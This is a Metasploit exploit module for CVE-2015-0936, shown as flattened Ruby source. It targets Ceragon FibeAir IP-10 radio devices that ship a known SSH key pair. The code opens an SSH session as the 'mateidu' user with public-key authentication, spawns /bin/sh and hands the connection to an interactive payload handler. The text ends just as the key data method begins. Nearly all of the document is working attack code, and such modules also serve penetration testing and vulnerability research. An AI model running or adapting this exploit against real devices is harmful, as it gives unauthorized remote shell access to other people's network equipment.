## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'net/ssh' class MetasploitModule < Msf::Exploit::Remote include Msf::Auxiliary::Report Rank = ExcellentRanking def initialize(info = {}) super(update_info(info, { 'Name' => 'Ceragon FibeAir IP-10 SSH Private Key Exposure', 'Description' => %q{ Ceragon ships a public/private key pair on FibeAir IP-10 devices that allows passwordless authentication to any other IP-10 device. Since the key is easily retrievable, an attacker can use it to gain unauthorized remote access as the "mateidu" user. }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Privileged' => false, 'Targets' => [ [ "Universal", {} ] ], 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find', }, }, 'Author' => [ 'hdm', # Discovery 'todb' # Metasploit module and advisory text (mostly copy-paste) ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-0936'], ['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure ], 'DisclosureDate' => "Apr 01 2015", # Not a joke 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, 'DefaultTarget' => 0 })) register_options( [ # Since we don't include Tcp, we have to register this manually Opt::RHOST(), Opt::RPORT(22) ], self.class ) register_advanced_options( [ OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) end # helper methods that normally come from Tcp def rhost datastore['RHOST'] end def rport datastore['RPORT'] end def do_login(user) factory = Rex::Socket::SSHFactory.new(framework,self, datastore['Proxies']) opt_hash = { auth_methods: ['publickey'], port: rport, key_data: [ key_data ], use_agent: false, config: false, proxy: factory, non_interactive: true } opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] begin ssh_socket = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh_socket = Net::SSH.start(rhost, user, opt_hash) end rescue Rex::ConnectionError return nil rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" return nil rescue ::Timeout::Error print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" return nil rescue Net::SSH::AuthenticationFailed print_error "#{rhost}:#{rport} SSH - Failed authentication" return nil rescue Net::SSH::Exception => e print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" return nil end if ssh_socket # Create a new session from the socket, then dump it. conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) ssh_socket = nil return conn else return nil end end def exploit conn = do_login("mateidu") if conn print_good "#{rhost}:#{rport} - Successful login" handler(conn.lsock) end end def key_data <